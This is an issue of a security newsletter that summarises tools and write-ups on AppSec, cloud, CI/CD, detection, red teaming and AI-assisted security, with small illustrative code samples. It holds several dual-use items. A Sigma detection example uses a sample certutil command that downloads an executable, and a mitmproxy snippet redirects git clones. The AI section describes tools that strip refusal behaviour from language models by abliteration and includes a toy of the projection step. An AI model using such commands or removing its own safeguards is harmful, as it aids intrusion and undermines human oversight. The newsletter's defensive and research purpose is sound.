Brace Yourself, Conferences Cometh
I’m excited for BSidesSF and RSA but phew, things have been busy
If you’re flying in to San Francisco, safe travels! And remember to periodically eat, sleep, and shower amidst all the fun conference and event activities.
Semgrep is also having a ton of events. If you need a break from the RSA craziness you can stop by the office, get some coffee, snacks, or lunch, and chat with some Semgrep folks if you want.
If you find me I’ll have some tl;dr sec t-shirts and brand new stickers…
Hard to tell from the photo but it’s holographic
AppSec
Introducing Swagger Jacker: Auditing OpenAPI Definition Files
Bishop Fox’s Tony West announces Swagger Jacker, a command line tool for auditing endpoints defined in exposed (Swagger/OpenAPI) definition files. It parses the definition file for paths, parameters, and accepted methods and passes the results to one of five subcommands: automate (sends requests and analyzes response status codes), prepare (generates curl/sqlmap command templates for manual testing), endpoints (lists raw API routes), brute (discovers hidden definition files using 2173+ common paths), and convert (converts v2 to v3 definitions).
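The parsing step is simple to picture. Here's a minimal Python sketch (my illustration, not sj's actual Go implementation) of pulling method/path pairs out of an OpenAPI JSON document:

```python
import json

def extract_endpoints(spec_text):
    """Return (METHOD, path) pairs from a Swagger/OpenAPI definition."""
    spec = json.loads(spec_text)
    http_methods = {"get", "put", "post", "delete", "options", "head", "patch", "trace"}
    endpoints = []
    for path, item in spec.get("paths", {}).items():
        for method in item:
            if method.lower() in http_methods:
                endpoints.append((method.upper(), path))
    return endpoints

spec = """{
  "openapi": "3.0.0",
  "paths": {
    "/users/{id}": {"get": {}, "delete": {}},
    "/login": {"post": {}}
  }
}"""
print(extract_endpoints(spec))
# [('GET', '/users/{id}'), ('DELETE', '/users/{id}'), ('POST', '/login')]
```

From there, each subcommand is a different consumer of that list (request them, template them, print them, etc.).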
mitmproxy for fun and profit: Interception and Analysis of Application
Guide by Synacktiv’s Corentin Liaud on using mitmproxy for network traffic interception across Linux, Android, and iOS, including three examples: redirecting git clone requests to download a different repository by modifying HTTP paths, spoofing Android geolocation by parsing and altering gRPC/protobuf coordinates sent to Google’s geomobileservices API, and passively capturing Mumble VoIP chat messages by running mitmproxy in reverse TLS mode with custom protobuf parsing scripts.
The post describes setting up your test environment (using Linux network namespaces, lnxrouter for WiFi AP creation, and nftables for transparent traffic redirection), using Magisk’s Cert-Fixer module to install system certificates on Android, and includes Python scripts showing how to parse and modify protocol buffers in transit.
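To make the git clone redirection concrete, here's the core rewrite as a pure Python function (my sketch, with a hypothetical target repo; in a real mitmproxy addon you'd do this inside the request hook and assign the result back to the request's path):

```python
def rewrite_git_path(path, target_repo="some-org/other-repo"):
    """If this looks like a git smart-HTTP clone request for any repo,
    point it at a different (hypothetical) repository instead."""
    # git clone over HTTP first hits /<org>/<repo>/info/refs?service=git-upload-pack
    marker = "/info/refs"
    if marker in path and "service=git-upload-pack" in path:
        return "/" + target_repo + path[path.index(marker):]
    return path

print(rewrite_git_path("/torvalds/linux/info/refs?service=git-upload-pack"))
# /some-org/other-repo/info/refs?service=git-upload-pack
```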
If you’ve ever looked at utilization curves, you know what happens when a queue runs hot: wait time doesn’t scale linearly. It spikes. In a SOC, that means alerts aging out before anyone touches them.
“The Queue is the Breach” ebook from Prophet Security applies operational math to SOC performance: alert cycle time, wait time by severity, and what analyst utilization actually implies about your team’s capacity. It’s a framework for diagnosing whether your bottleneck is people, tooling, or the operating model.
Written by Jon Hencinski, Head of Security Operations at Prophet.
Nice, I like when people take a data-driven approach to security
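The nonlinearity is easy to demonstrate with basic queueing theory. In the simplest M/M/1 model, with arrival rate lam and service rate mu, mean time in system is W = 1/(mu - lam), so wait time explodes as utilization approaches 1 (toy numbers, not from the ebook):

```python
# M/M/1 queue: arrival rate lam and service rate mu (alerts/hour),
# utilization rho = lam/mu, mean time in system W = 1/(mu - lam).

def mean_time_in_system(lam, mu):
    assert lam < mu, "queue is unstable once rho >= 1"
    return 1 / (mu - lam)

mu = 10.0                      # team clears 10 alerts/hour
for lam in (5.0, 9.0, 9.9):    # rho = 0.5, 0.9, 0.99
    w_minutes = mean_time_in_system(lam, mu) * 60
    print(f"rho={lam / mu:.2f}  avg time in system ~{w_minutes:.0f} min")
```

Going from 50% to 99% utilization takes the average alert from ~12 minutes in the queue to ~10 hours, which is exactly the "alerts aging out" failure mode.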
Cloud Security
Twenty Years of Cloud Security Research
Cloud historian, scholar, and man of the people Scott Piper traces 20 years of cloud security evolution through three distinct eras: the Foundational era (2006-2016) when AWS built core security features like IAM (2011), CloudTrail (2013), and Organizations (2016); the CSPM era (2016-2021) marked by open-source tools like Scout2, Cloud Custodian, Prowler, CloudMapper, Pacu, and StreamAlert; and the CNAPP era (2021-2025) with new cloud security vendors and researchers discovering cross-tenant vulnerabilities like ChaosDB and OMIGOD. The emerging AI era (2025+) is fundamentally changing both offense and defense, with AI creating exploits for CVE-2025-32433 and mongobleed in minutes, winning HackerOne’s top bounty spot, and solving CTF challenges instantly.
Great overview of relevant research and tools, and nice perspective on how cloud security has been evolving over time.
Bucketsquatting is (Finally) Dead
Ian McKay describes AWS’s new S3 bucket namespace protection that prevents bucketsquatting by requiring new buckets to follow a reserved, account-bound naming format, ensuring only the owning account can create buckets matching that pattern. AWS recommends this namespace be used by default for all new buckets and provides a new condition key s3:x-amz-bucket-namespace that security administrators can enforce via SCPs across their organization.
Google Cloud Storage addresses this differently through domain name verification for bucket names, while Azure Blob Storage remains vulnerable due to its configurable account/container name structure and 24-character limit on storage account names.
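As a sketch of what that enforcement might look like (the s3:x-amz-bucket-namespace key name is from the announcement, but the condition operator and overall policy shape here are my assumptions, not AWS's published example):

```python
import json

# Hypothetical SCP: deny bucket creation unless the request carries a bucket
# namespace (the "Null" condition operator matches when the key is absent).
scp = {
    "Version": "2012-10-17",
    "Statement": [{
        "Sid": "RequireBucketNamespace",
        "Effect": "Deny",
        "Action": "s3:CreateBucket",
        "Resource": "*",
        "Condition": {"Null": {"s3:x-amz-bucket-namespace": "true"}},
    }],
}
print(json.dumps(scp, indent=2))
```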
Supply Chain
Building Bridges, Breaking Pipelines: Introducing Trajan
Praetorian’s AJ Hammond, Carter Ross, Evan Leleux, et al. announce Trajan, an open-source CI/CD security tool that unifies vulnerability detection and attack validation across GitHub Actions, GitLab CI, Azure DevOps, and Jenkins in a single cross-platform engine. It ships with 32 detection plugins and 24 attack plugins covering poisoned pipeline execution, secrets exposure, self-hosted runner risks, and AI/LLM pipeline vulnerabilities.
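For a flavor of what a poisoned pipeline execution check looks for, here's a deliberately naive sketch (not Trajan's actual logic): flag GitHub Actions workflows that combine the privileged pull_request_target trigger with a checkout of the attacker-controlled PR head.

```python
def flags_ppe(workflow_text):
    """Deliberately naive string check, standing in for real workflow parsing."""
    privileged = "pull_request_target" in workflow_text
    checks_out_pr_head = "github.event.pull_request.head" in workflow_text
    return privileged and checks_out_pr_head

risky = """
on: pull_request_target
jobs:
  build:
    steps:
      - uses: actions/checkout@v4
        with:
          ref: ${{ github.event.pull_request.head.sha }}
      - run: make test  # attacker-controlled code now runs with repo secrets
"""
print(flags_ppe(risky))  # True
```

A real detector parses the workflow YAML and reasons about triggers, refs, and secrets exposure rather than substring matching, but this is the shape of the vulnerable pattern.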
Nice walkthrough of noticing your open source repos are being targeted → investigating potential impact, and solid advice on hardening open source repos/GitHub Actions. Also, I really like the bullets towards the top on Datadog’s SDLC Security team initiatives re: adopting octo-sts, removing GitHub Action secrets at scale, enforcing CI security best practices, and building golden paths.
Blue Team
elastic/agent-skills
Elastic’s official Skills repo, covering cloud, Elasticsearch, Kibana, observability, and security. It currently includes four security Skills: alert triage, case management (managing SOC cases via Kibana Cases when tracking incidents), detection rule management (creating, tuning, and managing Elastic Security detection rules), and sample security data generation (security events, attack scenarios, and synthetic alerts).
Pattern Detection and Correlation in JSON Logs
Mostafa Moradian announces RSigma, a Rust-based command-line tool that evaluates Sigma detection rules against JSON logs without requiring a SIEM. “Think of RSigma as jq for threat detection: you point it at a set of Sigma detection rules and a stream of JSON events, and it tells you what matched, with no ingestion pipeline, no database, no infrastructure.”
RSigma parses YAML rules into a strongly-typed AST, compiles them into optimized matchers, and evaluates them directly against JSON log events in real-time. The toolkit includes rsigma-parser for parsing, rsigma-eval for compilation and evaluation with stateful correlation logic and compressed event storage, a CLI for parsing, validating, linting, and evaluating rules, and rsigma-lsp for IDE support.
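For intuition on what "evaluating Sigma rules against JSON events" means, here's a toy matcher supporting equality and the |contains field modifier (a tiny illustrative subset I wrote for this blurb; RSigma's compiled matchers cover vastly more of the spec):

```python
def field_matches(field, expected, event):
    # Plain equality plus the "|contains" modifier: a small subset of Sigma.
    if field.endswith("|contains"):
        return expected in event.get(field[: -len("|contains")], "")
    return event.get(field) == expected

def selection_matches(selection, event):
    return all(field_matches(f, v, event) for f, v in selection.items())

# Detection block of a toy rule; the condition is "selection and download".
detection = {
    "selection": {"Image|contains": "certutil.exe"},
    "download": {"CommandLine|contains": "-urlcache"},
}

event = {"Image": r"C:\Windows\System32\certutil.exe",
         "CommandLine": "certutil -urlcache -f http://example.com/a.exe a.exe"}

hit = all(selection_matches(sel, event) for sel in detection.values())
print(hit)  # True
```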
Accurately evaluating the full spectrum of what Sigma rules can express is quite complex; it’s pretty neat to read about how RSigma handles all of these conditional expressions, correlation across rules, etc.
Red Team
nikaiw/VMkatz
Extract Windows credentials directly from VM memory snapshots and virtual disks: a single static 2.5MB binary that pulls NTLM hashes, DPAPI master keys, Kerberos tickets, cached domain credentials, LSA secrets, and NTDS.dit straight out of snapshot and disk files, with no need to exfiltrate a massive VM file.
Solving the Vendor Dependency Problem in RE
Many enterprise applications ship with hundreds to thousands of vendor dependencies, which makes it annoying to locate and analyze the proprietary source code of the application. You drown in vendor code, not the exposed attack surface. Assetnote’s Patrik Grobshäuser announces the release of Hyoketsu, an open-source tool that automatically filters vendor dependencies from Java JARs and .NET DLLs during reverse engineering by using Microsoft runtime detection (via PE header public key tokens), hash matching, and filename matching against a 13.3 GB pre-built SQLite database containing 12M+ DLLs and 14M+ JARs.
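The hash-matching piece is straightforward to sketch (my reconstruction with a made-up schema, not Hyoketsu's actual implementation): index known vendor artifacts by digest in SQLite, then filter out anything that matches so only first-party code is left to reverse.

```python
import hashlib
import sqlite3

db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE known_vendor (sha256 TEXT PRIMARY KEY, name TEXT)")

vendor_blob = b"...bytes of a well-known vendor jar..."
db.execute("INSERT INTO known_vendor VALUES (?, ?)",
           (hashlib.sha256(vendor_blob).hexdigest(), "vendor-lib.jar"))

def is_vendor(blob):
    digest = hashlib.sha256(blob).hexdigest()
    row = db.execute("SELECT 1 FROM known_vendor WHERE sha256 = ?",
                     (digest,)).fetchone()
    return row is not None

print(is_vendor(vendor_blob))          # True: filter it out
print(is_vendor(b"first-party code"))  # False: keep it for analysis
```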
AI + Security
p-e-w/heretic
By Philipp Emanuel Weidmann: fully automatic censorship removal for language models. Heretic removes censorship (aka “safety alignment”) from transformer-based language models without expensive post-training, using an advanced implementation of directional ablation, also known as “abliteration,” to create a decensored model that retains as much of the original model’s intelligence as possible.
elder-plinius/OBLITERATUS
By Pliny the Liberator: an open-source toolkit for removing refusal behaviors from LLMs via abliteration (surgically identifying and projecting out internal refusal representations without retraining). Every obliteration run with telemetry enabled contributes anonymous benchmark data to a crowd-sourced research dataset measuring refusal direction universality across 116+ models and 5 compute tiers.
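Both tools center on the same core operation: estimate a "refusal direction" r from contrastive prompts, then project it out so the model can no longer represent it, i.e. h' = h - (h . r) r for unit-norm r. A pure-Python toy on small vectors (real implementations operate on model weights and activations):

```python
def dot(a, b):
    return sum(x * y for x, y in zip(a, b))

def ablate(h, r):
    """Remove the component of h along unit vector r: h' = h - (h . r) r."""
    scale = dot(h, r)
    return [hi - scale * ri for hi, ri in zip(h, r)]

r = [1.0, 0.0, 0.0]       # toy unit-norm "refusal direction"
h = [0.7, 0.2, -0.4]      # toy hidden state
h_prime = ablate(h, r)
print(h_prime)            # [0.0, 0.2, -0.4]
print(dot(h_prime, r))    # 0.0: no refusal component left
```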
As open source models become better and better, not sure how I feel about removing “don’t cause harm” alignment training
Why Codex Security Doesn’t Include a SAST Report
OpenAI describes why Codex Security doesn’t start by triaging SAST results, but instead starts with understanding the repository’s architecture and trust boundaries: they don’t want to overly influence where Codex looks, not all bugs are dataflow problems, and sometimes code appears to enforce a security check but doesn’t actually guarantee the property the system relies on.
When Codex Security encounters a boundary that looks like “validation” or “sanitization,” it tries to bypass it:
Reading the relevant code path with full repository context, looking for mismatches between intent and implementation.
Pulling out security-relevant code slices and writing micro-fuzzers for them.
Solving complicated input constraint problems using a Python environment with z3-solver (which they give the model access to).
Executing hypotheses in a sandboxed validation environment to prove exploitability.
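The micro-fuzzer idea is worth making concrete. A hypothetical example (everything here is invented for illustration, not from the post): an extracted "sanitizer" slice that only checks for a traversal prefix, plus a tiny exhaustive fuzzer that compares it against a ground-truth oracle and finds the bypass.

```python
import itertools
import posixpath

def is_safe(path):
    # Extracted "validation" slice (intentionally buggy): only rejects
    # paths that *start* with a traversal sequence.
    return not path.startswith("../")

def escapes_root(path):
    # Ground-truth oracle: does the path resolve outside a root directory?
    return not posixpath.normpath(posixpath.join("root", path)).startswith("root")

# Exhaustively "fuzz" short combinations of interesting path pieces.
pieces = ["a", "..", "etc"]
bypasses = ["/".join(c) for c in itertools.product(pieces, repeat=3)
            if is_safe("/".join(c)) and escapes_root("/".join(c))]
print(bypasses)  # ['a/../..', 'etc/../..']: inputs the check wrongly allows
```

The mismatch between "intent" (block traversal) and "implementation" (prefix check) is exactly the kind of gap the post says Codex hunts for.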
The post is overall a good discussion of the space and outlines challenges for security scanners. I especially liked the “how Codex validates” section, though, because it starts getting into some of Codex Security’s unique technical details.
Securing our codebase with autonomous agents
Travis McPeak describes how Cursor built four security automation templates using Cursor Automations and a custom security MCP tool to handle securing their code at scale, as Cursor’s PR velocity has increased 5x in the past 9 months. The automations include: Agentic Security Review (blocks PRs with security issues), Vuln Hunter (scans existing code for vulnerabilities), Anybump (automatically patches dependencies using reachability analysis and opens PRs after tests pass), and Invariant Sentinel (monitors daily for drift against security/compliance properties). You can see their prompts on their marketplace pages.
Their security MCP, deployed as a serverless Lambda function, provides persistent data storage, deduplication of LLM-generated findings using Gemini Flash 2.5, and consistent Slack reporting across all agents. In the last two months, Agentic Security Review alone has run on thousands of PRs and prevented hundreds of security issues from reaching production.
I like the focus on useful primitives that empower you to build security tooling on top of: “For agents to be useful for security, they need: out-of-the-box integrations for receiving webhooks, responding to GitHub pull requests, and monitoring codebase changes, and a rich agent harness and environment (cloud agents give them all the tools, skills, and observability that cloud agents have access to).”
I also wanted to call out the Invariant Sentinel, that’s very clever: what security properties about this repo should always be true? Did this most recent change violate that? I bet detecting drift like this catches some meaningful bugs.
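A hypothetical sketch of the invariant idea (these properties are made up for illustration, not Cursor's actual checks): encode "should always be true" properties as checks and run them against whatever changed.

```python
import re

# Made-up repo invariants, each a (name, pattern) pair whose match = violation.
INVARIANTS = [
    ("no wildcard CORS", re.compile(r"Access-Control-Allow-Origin:\s*\*")),
    ("no hardcoded AWS access keys", re.compile(r"AKIA[0-9A-Z]{16}")),
]

def check_diff(changed_files):
    """changed_files: {path: new_contents}. Returns invariant violations."""
    return [(path, name)
            for path, text in changed_files.items()
            for name, pattern in INVARIANTS
            if pattern.search(text)]

violations = check_diff({
    "api/server.py": 'resp.headers.add("Access-Control-Allow-Origin: *")',
    "infra/deploy.py": 'KEY = "AKIAIOSFODNN7EXAMPLE"',
    "README.md": "nothing to see here",
})
print(violations)
```

The interesting part of the real system is presumably that an agent, not a regex, evaluates each property, so the invariants can be semantic ("all admin routes require MFA") rather than textual.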
We proactively fixed ~100 security issues in 6 days with 0 humans
Eli Block describes how Ramp Security Engineering built a custom agent pipeline that autonomously found, validated, and fixed ~100 novel security issues in 6 days. Their pipeline starts off with a coordinator agent equipped with skills for each vulnerability category (e.g. IDOR, XSS, …), which launches detector agents in parallel, whose findings are then passed to an adversarial manager agent who checks for false positives (~40% false positive reduction in their testing sample set).
They found it was difficult to reproduce vulnerabilities with complex pre-conditions against a live Ramp deployment, so instead their validator agent takes reported findings and writes an integration test that reproduces the vulnerability and passes only if the endpoint is secure. Then the fixer agent can patch the vulnerability by following test-driven development against that integration test.
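Here's a toy version of that "test passes only if the endpoint is secure" pattern (an invented example, not Ramp's code): an IDOR reproduced as an assertion that one user cannot read another's record.

```python
# Toy data store and endpoint. The ownership check is the fix the fixer
# agent would add; delete it and test_no_idor() flips to False.
RECEIPTS = {1: {"owner": "alice", "total": 42}, 2: {"owner": "bob", "total": 7}}

def get_receipt(receipt_id, current_user):
    receipt = RECEIPTS[receipt_id]
    if receipt["owner"] != current_user:
        raise PermissionError("not yours")
    return receipt

def test_no_idor():
    try:
        get_receipt(2, current_user="alice")  # alice requests bob's receipt
    except PermissionError:
        return True          # secure: the test passes
    return False             # vulnerable: IDOR reproduced, the test fails

print(test_no_idor())  # True
```

Run before the fix it fails (documenting the bug), run after it passes, and it sticks around as a regression test.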
Great write-up! Overall this agent pipeline follows a pretty standard structure (per bug class detectors → vet findings → try to reproduce / “prove” the issue → generate fix), but a few things stand out as unique and valuable insights:
Detectors include real examples of that vulnerability from Ramp’s code base. I bet this allows the detectors to be much more precise and effective.
Rather than trying to reproduce vulnerabilities in a live environment, they write integration tests that demonstrate the bug. As there are probably already test fixtures or other examples in the code the agent can borrow from, it makes sense that this method would often work in practice. This approach also has the added benefit that you now have a regression test for this bug coming back in the future.
So this leans into what models are good at (writing code) and future-proofs against the bug coming back
I’ve been thinking about this approach for a bit now so it’s gratifying to see someone do it
Wrapping Up
Have questions, comments, or feedback? Just reply directly, I’d love to hear from you.
If you find this newsletter useful and know other people who would too, I’d really appreciate it if you’d forward it to them
P.S. Feel free to connect with me on LinkedIn

